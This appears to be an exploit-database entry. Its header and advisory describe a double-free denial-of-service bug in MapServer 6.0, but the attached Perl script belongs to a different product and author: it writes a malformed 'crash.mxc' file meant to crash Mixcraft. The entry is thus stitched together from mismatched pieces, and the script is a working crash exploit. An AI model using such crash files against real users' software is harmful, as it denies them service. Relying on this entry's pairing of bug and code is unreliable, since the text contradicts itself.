MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service

EDB-ID:

36092

Author:

rouault

Type:

dos

Platform:

Windows

Published:

2011-08-30

source: http://www.securityfocus.com/bid/49374/info

MapServer is prone to a remote denial-of-service vulnerability due to a double free condition.

Attackers can exploit this issue to crash the application, denying service to legitimate users. Due to the nature of this issue, code execution may be possible; however, this has not been confirmed.

Versions prior to MapServer 6.0.1 are vulnerable. 

#!/usr/bin/perl
 
print q(
########################################################
# home : http://www.D99Y.com 
# Date : 9/8/2011 
# Author : NassRawI 
# Software Link : http://www.acoustica.com/mixcraft/
# Version : v1.00 Build 10 
# Tested on : Windows XP SP2
########################################################
);
 
my $file= "crash.mxc";
my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
open(d99y,">$file");
print d99y $junk ;
close(d99y);
print "\n [ # ] Vulnerable File Created !\n"